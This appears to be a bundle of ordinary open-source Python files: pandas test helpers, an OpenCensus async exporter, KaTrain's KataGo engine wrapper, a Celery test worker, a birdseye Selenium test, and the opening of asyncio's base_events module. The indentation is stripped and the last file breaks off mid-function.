name = None if names is None else names[0]
index = Index((x[0] for x in tuples), name=name)
else:
index = MultiIndex.from_tuples(tuples, names=names)
return index
def makeCustomDataframe(
nrows,
ncols,
c_idx_names=True,
r_idx_names=True,
c_idx_nlevels=1,
r_idx_nlevels=1,
data_gen_f=None,
c_ndupe_l=None,
r_ndupe_l=None,
dtype=None,
c_idx_type=None,
r_idx_type=None,
):
"""
Create a DataFrame using supplied parameters.
Parameters
----------
nrows, ncols - number of data rows/cols
c_idx_names, idx_names - False/True/list of strings, yields No names ,
default names or uses the provided names for the levels of the
corresponding index. You can provide a single string when
c_idx_nlevels ==1.
c_idx_nlevels - number of levels in columns index. > 1 will yield MultiIndex
r_idx_nlevels - number of levels in rows index. > 1 will yield MultiIndex
data_gen_f - a function f(row,col) which return the data value
at that position, the default generator used yields values of the form
"RxCy" based on position.
c_ndupe_l, r_ndupe_l - list of integers, determines the number
of duplicates for each label at a given level of the corresponding
index. The default `None` value produces a multiplicity of 1 across
all levels, i.e. a unique index. Will accept a partial list of length
N < idx_nlevels, for just the first N levels. If ndupe doesn't divide
nrows/ncol, the last label might have lower multiplicity.
dtype - passed to the DataFrame constructor as is, in case you wish to
have more control in conjunction with a custom `data_gen_f`
r_idx_type, c_idx_type - "i"/"f"/"s"/"u"/"dt"/"td".
If idx_type is not None, `idx_nlevels` must be 1.
"i"/"f" creates an integer/float index,
"s"/"u" creates a string/unicode index
"dt" create a datetime index.
"td" create a timedelta index.
if unspecified, string labels will be generated.
Examples
--------
# 5 row, 3 columns, default names on both, single index on both axis
>> makeCustomDataframe(5,3)
# make the data a random int between 1 and 100
>> mkdf(5,3,data_gen_f=lambda r,c:randint(1,100))
# 2-level multiindex on rows with each label duplicated
# twice on first level, default names on both axis, single
# index on both axis
>> a=makeCustomDataframe(5,3,r_idx_nlevels=2,r_ndupe_l=[2])
# DatetimeIndex on row, index with unicode labels on columns
# no names on either axis
>> a=makeCustomDataframe(5,3,c_idx_names=False,r_idx_names=False,
r_idx_type="dt",c_idx_type="u")
# 4-level multindex on rows with names provided, 2-level multindex
# on columns with default labels and default names.
>> a=makeCustomDataframe(5,3,r_idx_nlevels=4,
r_idx_names=["FEE","FI","FO","FAM"],
c_idx_nlevels=2)
>> a=mkdf(5,3,r_idx_nlevels=2,c_idx_nlevels=4)
"""
assert c_idx_nlevels > 0
assert r_idx_nlevels > 0
assert r_idx_type is None or (
r_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and r_idx_nlevels == 1
)
assert c_idx_type is None or (
c_idx_type in ("i", "f", "s", "u", "dt", "p", "td") and c_idx_nlevels == 1
)
columns = makeCustomIndex(
ncols,
nlevels=c_idx_nlevels,
prefix="C",
names=c_idx_names,
ndupe_l=c_ndupe_l,
idx_type=c_idx_type,
)
index = makeCustomIndex(
nrows,
nlevels=r_idx_nlevels,
prefix="R",
names=r_idx_names,
ndupe_l=r_ndupe_l,
idx_type=r_idx_type,
)
# by default, generate data based on location
if data_gen_f is None:
data_gen_f = lambda r, c: f"R{r}C{c}"
data = [[data_gen_f(r, c) for c in range(ncols)] for r in range(nrows)]
return DataFrame(data, index, columns, dtype=dtype)
def _create_missing_idx(nrows, ncols, density, random_state=None):
if random_state is None:
random_state = np.random
else:
random_state = np.random.RandomState(random_state)
# below is cribbed from scipy.sparse
size = round((1 - density) * nrows * ncols)
# generate a few more to ensure unique values
min_rows = 5
fac = 1.02
extra_size = min(size + min_rows, fac * size)
def _gen_unique_rand(rng, _extra_size):
ind = rng.rand(int(_extra_size))
return np.unique(np.floor(ind * nrows * ncols))[:size]
ind = _gen_unique_rand(random_state, extra_size)
while ind.size < size:
extra_size *= 1.05
ind = _gen_unique_rand(random_state, extra_size)
j = np.floor(ind * 1.0 / nrows).astype(int)
i = (ind - j * nrows).astype(int)
return i.tolist(), j.tolist()
def makeMissingDataframe(density=0.9, random_state=None):
df = makeDataFrame()
i, j = _create_missing_idx(*df.shape, density=density, random_state=random_state)
df.values[i, j] = np.nan
return df
def test_parallel(num_threads=2, kwargs_list=None):
"""
Decorator to run the same function multiple times in parallel.
Parameters
----------
num_threads : int, optional
The number of times the function is run in parallel.
kwargs_list : list of dicts, optional
The list of kwargs to update original
function kwargs on different threads.
Notes
-----
This decorator does not pass the return value of the decorated function.
Original from scikit-image:
https://github.com/scikit-image/scikit-image/pull/1519
"""
assert num_threads > 0
has_kwargs_list = kwargs_list is not None
if has_kwargs_list:
assert len(kwargs_list) == num_threads
import threading
def wrapper(func):
@wraps(func)
def inner(*args, **kwargs):
if has_kwargs_list:
update_kwargs = lambda i: dict(kwargs, **kwargs_list[i])
else:
update_kwargs = lambda i: kwargs
threads = []
for i in range(num_threads):
updated_kwargs = update_kwargs(i)
thread = threading.Thread(target=func, args=args, kwargs=updated_kwargs)
threads.append(thread)
for thread in threads:
thread.start()
for thread in threads:
thread.join()
return inner
return wrapper
class SubclassedSeries(Series):
_metadata = ["testattr", "name"]
@property
def _constructor(self):
return SubclassedSeries
@property
def _constructor_expanddim(self):
return SubclassedDataFrame
class SubclassedDataFrame(DataFrame):
_metadata = ["testattr"]
@property
def _constructor(self):
return SubclassedDataFrame
@property
def _constructor_sliced(self):
return SubclassedSeries
class SubclassedCategorical(Categorical):
@property
def _constructor(self):
return SubclassedCategorical
def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
return sep.join(rows_list) + sep
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
List of three items (DataFrame, function, expected result)
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
# -----------------------------------------------------------------------------
# Indexing test helpers
def getitem(x):
return x
def setitem(x):
return x
def loc(x):
return x.loc
def iloc(x):
return x.iloc
def at(x):
return x.at
def iat(x):
return x.iat
|
async_.py | # Copyright 2018, OpenCensus Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import queue, range
import atexit
import logging
import threading
from opencensus.common.transports import base
from opencensus.trace import execution_context
_DEFAULT_GRACE_PERIOD = 5.0 # Seconds
_DEFAULT_MAX_BATCH_SIZE = 600
_DEFAULT_WAIT_PERIOD = 60.0 # Seconds
_WORKER_THREAD_NAME = 'opencensus.common.Worker'
_WORKER_TERMINATOR = object()
logger = logging.getLogger(__name__)
class _Worker(object):
"""A background thread that exports batches of data.
:type exporter: :class:`~opencensus.trace.base_exporter.Exporter` or
:class:`~opencensus.stats.base_exporter.StatsExporter`
:param exporter: Instance of Exporter object.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
:type wait_period: int
:param wait_period: The amount of time to wait before sending the next
batch of data.
"""
def __init__(self, exporter,
grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE,
wait_period=_DEFAULT_WAIT_PERIOD):
self.exporter = exporter
self._grace_period = grace_period
self._max_batch_size = max_batch_size
self._wait_period = wait_period
self._queue = queue.Queue(0)
self._lock = threading.Lock()
self._event = threading.Event()
self._thread = None
@property
def is_alive(self):
"""Returns True is the background thread is running."""
return self._thread is not None and self._thread.is_alive()
def _get_items(self):
"""Get multiple items from a Queue.
Gets at least one (blocking) and at most ``max_batch_size`` items
(non-blocking) from a given Queue. Does not mark the items as done.
:rtype: Sequence
:returns: A sequence of items retrieved from the queue.
"""
items = [self._queue.get()]
while len(items) < self._max_batch_size:
try:
items.append(self._queue.get_nowait())
except queue.Empty:
break
return items
def _thread_main(self):
"""The entry point for the worker thread.
Pulls pending data off the queue and writes them in
batches to the specified tracing backend using the exporter.
"""
# Indicate that this thread is an exporter thread.
# Used to suppress tracking of requests in this thread
execution_context.set_is_exporter(True)
quit_ = False
while True:
items = self._get_items()
data = []
for item in items:
if item is _WORKER_TERMINATOR:
quit_ = True
# Continue processing items, don't break, try to process
# all items we got back before quitting.
else:
data.extend(item)
if data:
try:
self.exporter.emit(data)
except Exception:
logger.exception(
'%s failed to emit data.'
'Dropping %s objects from queue.',
self.exporter.__class__.__name__,
len(data))
pass
for _ in range(len(items)):
self._queue.task_done()
# self._event is set at exit, at which point we start draining the
# queue immediately. If self._event is unset, block for
# self.wait_period between each batch of exports.
self._event.wait(self._wait_period)
if quit_:
break
def start(self):
"""Starts the background thread.
Additionally, this registers a handler for process exit to attempt
to send any pending data before shutdown.
"""
with self._lock:
if self.is_alive:
return
self._thread = threading.Thread(
target=self._thread_main, name=_WORKER_THREAD_NAME)
self._thread.daemon = True
self._thread.start()
atexit.register(self._export_pending_data)
def stop(self):
"""Signals the background thread to stop.
This does not terminate the background thread. It simply queues the
stop signal. If the main process exits before the background thread
processes the stop signal, it will be terminated without finishing
work. The ``grace_period`` parameter will give the background
thread some time to finish processing before this function returns.
:rtype: bool
:returns: True if the thread terminated. False if the thread is still
running.
"""
if not self.is_alive:
return True
with self._lock:
self._queue.put_nowait(_WORKER_TERMINATOR)
self._thread.join(timeout=self._grace_period)
success = not self.is_alive
self._thread = None
return success
def _export_pending_data(self):
"""Callback that attempts to send pending data before termination."""
if not self.is_alive:
return
# Stop blocking between export batches
self._event.set()
self.stop()
def enqueue(self, data):
"""Queues data to be written by the background thread."""
self._queue.put_nowait(data)
def flush(self):
"""Submit any pending data."""
self._queue.join()
class AsyncTransport(base.Transport):
"""Asynchronous transport that uses a background thread.
:type exporter: :class:`~opencensus.trace.base_exporter.Exporter` or
:class:`~opencensus.stats.base_exporter.StatsExporter`
:param exporter: Instance of Exporter object.
:type grace_period: float
:param grace_period: The amount of time to wait for pending data to
be submitted when the process is shutting down.
:type max_batch_size: int
:param max_batch_size: The maximum number of items to send at a time
in the background thread.
:type wait_period: int
:param wait_period: The amount of time to wait before sending the next
batch of data.
"""
def __init__(self, exporter,
grace_period=_DEFAULT_GRACE_PERIOD,
max_batch_size=_DEFAULT_MAX_BATCH_SIZE,
wait_period=_DEFAULT_WAIT_PERIOD):
self.exporter = exporter
self.worker = _Worker(
exporter,
grace_period,
max_batch_size,
wait_period,
)
self.worker.start()
def export(self, data):
"""Put the trace/stats to be exported into queue."""
self.worker.enqueue(data)
def flush(self):
"""Submit any pending traces/stats."""
self.worker.flush()
|
engine.py | import copy
import json
import os
import subprocess
import threading
import time
import traceback
from typing import Callable, Optional, Dict
from katrain.core.constants import OUTPUT_DEBUG, OUTPUT_ERROR, OUTPUT_EXTRA_DEBUG, OUTPUT_KATAGO_STDERR
from katrain.core.game_node import GameNode
from katrain.core.lang import i18n
from katrain.core.utils import find_package_resource
from kivy.utils import platform
class EngineDiedException(Exception):
pass
class KataGoEngine:
"""Starts and communicates with the KataGO analysis engine"""
# TODO: we don't support suicide in game.py, so no "tt": "tromp-taylor", "nz": "new-zealand"
RULESETS_ABBR = [("jp", "japanese"), ("cn", "chinese"), ("ko", "korean"), ("aga", "aga")]
RULESETS = {fromkey: name for abbr, name in RULESETS_ABBR for fromkey in [abbr, name]}
@staticmethod
def get_rules(node):
return KataGoEngine.RULESETS.get(str(node.ruleset).lower(), "japanese")
def __init__(self, katrain, config, override_command=None):
self.katrain = katrain
self.queries = {} # outstanding query id -> start time and callback
self.config = config
self.query_counter = 0
self.katago_process = None
self.base_priority = 0
self.override_settings = {"reportAnalysisWinratesAs": "BLACK"} # force these settings
self._lock = threading.Lock()
self.analysis_thread = None
self.stderr_thread = None
if override_command:
self.command = override_command
else:
exe = config["katago"].strip()
if not exe:
if platform == "win":
exe = "katrain/KataGo/katago.exe"
elif platform == "linux":
exe = "katrain/KataGo/katago"
else: # e.g. MacOS after brewing
exe = "katago"
model = find_package_resource(config["model"])
cfg = find_package_resource(config["config"])
if exe.startswith("katrain"):
exe = find_package_resource(exe)
exepath, exename = os.path.split(exe)
if exepath and not os.path.isfile(exe):
self.katrain.log(i18n._("Kata exe not found").format(exe=exe), OUTPUT_ERROR)
return # don't start
elif not exepath and not any(
os.path.isfile(os.path.join(path, exe)) for path in os.environ.get("PATH", "").split(os.pathsep)
):
self.katrain.log(i18n._("Kata exe not found in path").format(exe=exe), OUTPUT_ERROR)
return # don't start
elif not os.path.isfile(model):
self.katrain.log(i18n._("Kata model not found").format(model=model), OUTPUT_ERROR)
return # don't start
elif not os.path.isfile(cfg):
self.katrain.log(i18n._("Kata config not found").format(config=cfg), OUTPUT_ERROR)
return # don't start
self.command = f'"{exe}" analysis -model "{model}" -config "{cfg}" -analysis-threads {config["threads"]}'
self.start()
def start(self):
try:
self.katrain.log(f"Starting KataGo with {self.command}", OUTPUT_DEBUG)
self.katago_process = subprocess.Popen(
self.command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True
)
except (FileNotFoundError, PermissionError, OSError) as e:
self.katrain.log(
i18n._("Starting Kata failed").format(command=self.command, error=e), OUTPUT_ERROR,
)
return # don't start
self.analysis_thread = threading.Thread(target=self._analysis_read_thread, daemon=True).start()
self.stderr_thread = threading.Thread(target=self._read_stderr_thread, daemon=True).start()
def on_new_game(self):
self.base_priority += 1
self.queries = {}
def restart(self):
self.queries = {}
self.shutdown(finish=False)
self.start()
def check_alive(self, os_error="", exception_if_dead=False):
ok = self.katago_process and self.katago_process.poll() is None
if not ok and exception_if_dead:
if self.katago_process:
os_error += f"status {self.katago_process and self.katago_process.poll()}"
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
self.katrain.log(died_msg, OUTPUT_ERROR)
self.katago_process = None
else:
died_msg = i18n._("Engine died unexpectedly").format(error=os_error)
raise EngineDiedException(died_msg)
return ok
def shutdown(self, finish=False):
process = self.katago_process
if finish and process:
while self.queries and process.poll() is None:
time.sleep(0.1)
if process:
self.katago_process = None
process.terminate()
if self.stderr_thread:
self.stderr_thread.join()
if self.analysis_thread:
self.analysis_thread.join()
def is_idle(self):
return not self.queries
def _read_stderr_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stderr.readline()
if line:
try:
self.katrain.log(line.decode(errors="ignore").strip(), OUTPUT_KATAGO_STDERR)
except Exception as e:
print("ERROR in processing KataGo stderr:", line, "Exception", e)
elif self.katago_process:
self.check_alive(exception_if_dead=True)
except Exception as e:
self.katrain.log(f"Exception in reading stdout {e}", OUTPUT_DEBUG)
return
def _analysis_read_thread(self):
while self.katago_process is not None:
try:
line = self.katago_process.stdout.readline()
if self.katago_process and not line:
self.check_alive(exception_if_dead=True)
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=True)
return
if b"Uncaught exception" in line:
self.katrain.log(f"KataGo Engine Failed: {line.decode(errors='ignore')}", OUTPUT_ERROR)
return
if not line:
continue
try:
analysis = json.loads(line)
if analysis["id"] not in self.queries:
self.katrain.log(f"Query result {analysis['id']} discarded -- recent new game?", OUTPUT_DEBUG)
continue
query_id = analysis["id"]
callback, error_callback, start_time, next_move = self.queries[query_id]
if "error" in analysis:
del self.queries[query_id]
if error_callback:
error_callback(analysis)
elif not (next_move and "Illegal move" in analysis["error"]): # sweep
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_ERROR)
elif "warning" in analysis:
self.katrain.log(f"{analysis} received from KataGo", OUTPUT_DEBUG)
else:
del self.queries[query_id]
time_taken = time.time() - start_time
self.katrain.log(
f"[{time_taken:.1f}][{analysis['id']}] KataGo Analysis Received: {analysis.keys()}",
OUTPUT_DEBUG,
)
self.katrain.log(line, OUTPUT_EXTRA_DEBUG)
try:
callback(analysis)
except Exception as e:
self.katrain.log(f"Error in engine callback for query {query_id}: {e}", OUTPUT_ERROR)
if getattr(self.katrain, "update_state", None): # easier mocking etc
self.katrain.update_state()
except Exception as e:
traceback.print_exc(e)
self.katrain.log(f"Unexpected exception {e} while processing KataGo output {line}", OUTPUT_ERROR)
def send_query(self, query, callback, error_callback, next_move=None):
with self._lock:
self.query_counter += 1
if "id" not in query:
query["id"] = f"QUERY:{str(self.query_counter)}"
self.queries[query["id"]] = (callback, error_callback, time.time(), next_move)
if self.katago_process:
self.katrain.log(f"Sending query {query['id']}: {json.dumps(query)}", OUTPUT_DEBUG)
try:
self.katago_process.stdin.write((json.dumps(query) + "\n").encode())
self.katago_process.stdin.flush()
except OSError as e:
self.check_alive(os_error=str(e), exception_if_dead=True)
return # do not raise, since there's nothing to catch it
def request_analysis(
self,
analysis_node: GameNode,
callback: Callable,
error_callback: Optional[Callable] = None,
visits: int = None,
analyze_fast: bool = False,
time_limit=True,
priority: int = 0,
ownership: Optional[bool] = None,
next_move: Optional[GameNode] = None,
extra_settings: Optional[Dict] = None,
):
moves = [m for node in analysis_node.nodes_from_root for m in node.moves]
initial_stones = analysis_node.root.placements
if next_move:
moves.append(next_move)
if ownership is None:
ownership = self.config["_enable_ownership"] and not next_move
if visits is None:
visits = self.config["max_visits"]
if analyze_fast and self.config.get("fast_visits"):
visits = self.config["fast_visits"]
size_x, size_y = analysis_node.board_size
settings = copy.copy(self.override_settings)
if time_limit:
settings["maxTime"] = self.config["max_time"]
if self.config.get("wide_root_noise", 0.0) > 0.0: # don't send if 0.0, so older versions don't error
settings["wideRootNoise"] = self.config["wide_root_noise"]
query = {
"rules": self.get_rules(analysis_node),
"priority": self.base_priority + priority,
"analyzeTurns": [len(moves)],
"maxVisits": visits,
"komi": analysis_node.komi,
"boardXSize": size_x,
"boardYSize": size_y,
"includeOwnership": ownership and not next_move,
"includePolicy": not next_move,
"initialStones": [[m.player, m.gtp()] for m in initial_stones],
"moves": [[m.player, m.gtp()] for m in moves],
"overrideSettings": {**settings, **(extra_settings or {})},
}
self.send_query(query, callback, error_callback, next_move)
analysis_node.analysis_visits_requested = max(analysis_node.analysis_visits_requested, visits)
|
worker.py | """Embedded workers for integration tests."""
from __future__ import absolute_import, unicode_literals
import os
import threading
from contextlib import contextmanager
from celery import worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error')
test_worker_starting = Signal(
name='test_worker_starting',
providing_args={},
)
test_worker_started = Signal(
name='test_worker_started',
providing_args={'worker', 'consumer'},
)
test_worker_stopped = Signal(
name='test_worker_stopped',
providing_args={'worker'},
)
class TestWorkController(worker.WorkController):
"""Worker that can synchronize on being fully started."""
def __init__(self, *args, **kwargs):
# type: (*Any, **Any) -> None
self._on_started = threading.Event()
super(TestWorkController, self).__init__(*args, **kwargs)
def on_consumer_ready(self, consumer):
# type: (celery.worker.consumer.Consumer) -> None
"""Callback called when the Consumer blueprint is fully started."""
self._on_started.set()
test_worker_started.send(
sender=self.app, worker=self, consumer=consumer)
def ensure_started(self):
# type: () -> None
"""Wait for worker to be fully up and running.
Warning:
Worker must be started within a thread for this to work,
or it will block forever.
"""
self._on_started.wait()
@contextmanager
def start_worker(
app, # type: Celery
concurrency=1, # type: int
pool='solo', # type: str
loglevel=WORKER_LOGLEVEL, # type: Union[str, int]
logfile=None, # type: str
perform_ping_check=True, # type: bool
ping_task_timeout=10.0, # type: float
**kwargs # type: Any
):
# type: (...) -> Iterable
"""Start embedded worker.
Yields:
celery.app.worker.Worker: worker instance.
"""
test_worker_starting.send(sender=app)
with _start_worker_thread(app,
concurrency=concurrency,
pool=pool,
loglevel=loglevel,
logfile=logfile,
perform_ping_check=perform_ping_check,
**kwargs) as worker:
if perform_ping_check:
from .tasks import ping
with allow_join_result():
assert ping.delay().get(timeout=ping_task_timeout) == 'pong'
yield worker
test_worker_stopped.send(sender=app, worker=worker)
@contextmanager
def _start_worker_thread(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
WorkController=TestWorkController,
perform_ping_check=True,
**kwargs):
# type: (Celery, int, str, Union[str, int], str, Any, **Any) -> Iterable
"""Start Celery worker in a thread.
Yields:
celery.worker.Worker: worker instance.
"""
setup_app_for_worker(app, loglevel, logfile)
if perform_ping_check:
assert 'celery.ping' in app.tasks
# Make sure we can connect to the broker
with app.connection(hostname=os.environ.get('TEST_BROKER')) as conn:
conn.default_channel.queue_declare
worker = WorkController(
app=app,
concurrency=concurrency,
hostname=anon_nodename(),
pool=pool,
loglevel=loglevel,
logfile=logfile,
# not allowed to override TestWorkController.on_consumer_ready
ready_callback=None,
without_heartbeat=True,
without_mingle=True,
without_gossip=True,
**kwargs)
t = threading.Thread(target=worker.start)
t.start()
worker.ensure_started()
_set_task_join_will_block(False)
yield worker
from celery.worker import state
state.should_terminate = 0
t.join(10)
state.should_terminate = None
@contextmanager
def _start_worker_process(app,
concurrency=1,
pool='solo',
loglevel=WORKER_LOGLEVEL,
logfile=None,
**kwargs):
# type (Celery, int, str, Union[int, str], str, **Any) -> Iterable
"""Start worker in separate process.
Yields:
celery.app.worker.Worker: worker instance.
"""
from celery.apps.multi import Cluster, Node
app.set_current()
cluster = Cluster([Node('testworker1@%h')])
cluster.start()
yield
cluster.stopwait()
def setup_app_for_worker(app, loglevel, logfile):
# type: (Celery, Union[str, int], str) -> None
"""Setup the app to be used for starting an embedded worker."""
app.finalize()
app.set_current()
app.set_default()
type(app.log)._setup = False
app.log.setup(loglevel=loglevel, logfile=logfile)
|
test_interface.py | from future.standard_library import install_aliases
install_aliases()
import tests
str(tests)
from time import sleep
import requests
from littleutils import only
from selenium.webdriver import ActionChains
from selenium.webdriver.chrome.options import Options
from birdseye import eye
import unittest
from threading import Thread
from birdseye.server import app
from selenium import webdriver
import os
@eye
def foo():
for i in range(20):
for j in range(3):
int(i * 13 + j * 17)
if i > 0:
try:
assert j
except AssertionError:
pass
str(bar())
x = list(range(1, 30, 2))
list(x)
@eye
def bar():
pass
class TestInterface(unittest.TestCase):
maxDiff = None
def setUp(self):
chrome_options = Options()
chrome_options.add_argument("--headless")
chrome_options.add_argument("--no-sandbox")
self.driver = webdriver.Chrome(options=chrome_options)
self.driver.set_window_size(1400, 1000)
self.driver.implicitly_wait(2)
if not os.environ.get('BIRDSEYE_SERVER_RUNNING'):
Thread(target=lambda: app.run(port=7777)).start()
def test(self):
try:
self._do_test()
except:
self.driver.save_screenshot('error_screenshot.png')
raise
def _do_test(self):
foo()
driver = self.driver
# On the index page, note the links to the function and call
driver.get('http://localhost:7777/')
function_link = driver.find_element_by_link_text('foo')
function_url = function_link.get_attribute('href')
call_url = function_link.find_element_by_xpath('..//i/..').get_attribute('href')
# On the file page, check that the links still match
driver.find_element_by_partial_link_text('test_interface').click()
function_link = driver.find_element_by_link_text('foo')
self.assertEqual(function_link.get_attribute('href'), function_url)
self.assertEqual(call_url, function_link.find_element_by_xpath('..//i/..').get_attribute('href'))
# Finally navigate to the call and check the original call_url
function_link.click()
driver.find_element_by_css_selector('table a').click()
self.assertEqual(driver.current_url, call_url)
# Test hovering, clicking on expressions, and stepping through loops
vals = {'i': 0, 'j': 0}
exprs = driver.find_elements_by_class_name('has_value')
expr_value = driver.find_element_by_id('box_value')
expr_strings = [
'i * 13 + j * 17',
'j * 17',
'i * 13',
]
def find_by_text(text, elements):
return only(n for n in elements if n.text == text)
def find_expr(text):
return find_by_text(text, exprs)
def tree_nodes(root=driver):
return root.find_elements_by_class_name('jstree-node')
def select(node, prefix, value_text):
self.assertIn('box', classes(node))
self.assertIn('has_value', classes(node))
self.assertNotIn('selected', classes(node))
node.click()
self.assertIn('selected', classes(node))
self.assertEqual(expr_value.text, value_text)
tree_node = tree_nodes()[-1]
self.assertEqual(tree_node.text, prefix + value_text)
return tree_node
def classes(node):
return set(node.get_attribute('class').split())
def assert_classes(node, *cls):
self.assertEqual(classes(node), set(cls))
for i, expr in enumerate(expr_strings):
find_expr(expr).click()
def step(loop, increment):
selector = '.loop-navigator > .btn:%s-child' % ('first' if increment == -1 else 'last')
buttons = driver.find_elements_by_css_selector(selector)
self.assertEqual(len(buttons), 2)
buttons[loop].click()
vals['ij'[loop]] += increment
for expr in expr_strings:
ActionChains(driver).move_to_element(find_expr(expr)).perform()
value = str(eval(expr, {}, vals))
self.assertEqual(expr_value.text, value)
node = only(n for n in tree_nodes()
if n.text.startswith(expr + ' ='))
self.assertEqual(node.text, '%s = int: %s' % (expr, value))
stmt = find_by_text('assert j', driver.find_elements_by_class_name('stmt'))
assert_classes(stmt, 'stmt', 'stmt_uncovered', 'box')
step(0, 1)
select(stmt, 'assert j : ', 'AssertionError')
assert_classes(stmt, 'stmt', 'selected', 'box', 'hovering', 'has_value', 'exception_node')
step(1, 1)
self.assertEqual(tree_nodes()[-1].text, 'assert j : fine')
assert_classes(stmt, 'stmt', 'selected', 'box', 'has_value', 'value_none')
step(1, 1)
step(0, -1)
self.assertTrue({'stmt', 'stmt_uncovered', 'selected', 'box'} <= classes(stmt))
step(1, -1)
# Expanding values
x_node = find_expr('x')
tree_node = select(x_node, 'x = list: ', '[1, 3, 5, ..., 25, 27, 29]')
tree_node.find_element_by_class_name('jstree-ocl').click() # expand
sleep(0.2)
self.assertEqual([n.text for n in tree_nodes(tree_node)],
['len() = 15',
'0 = int: 1',
'1 = int: 3',
'2 = int: 5',
'3 = int: 7',
'4 = int: 9',
'10 = int: 21',
'11 = int: 23',
'12 = int: 25',
'13 = int: 27',
'14 = int: 29']),
# Click on an inner call
find_expr('bar()').find_element_by_class_name('inner-call').click()
self.assertEqual(driver.find_element_by_tag_name('h2').text,
'Call to function: bar')
def tearDown(self):
if not os.environ.get('BIRDSEYE_SERVER_RUNNING'):
self.assertEqual(requests.post('http://localhost:7777/kill').text,
'Server shutting down...')
|
base_events.py | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
cb = handle._callback
if isinstance(getattr(cb, '__self__', None), tasks.Task):
# format the task
return repr(cb.__self__)
else:
return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
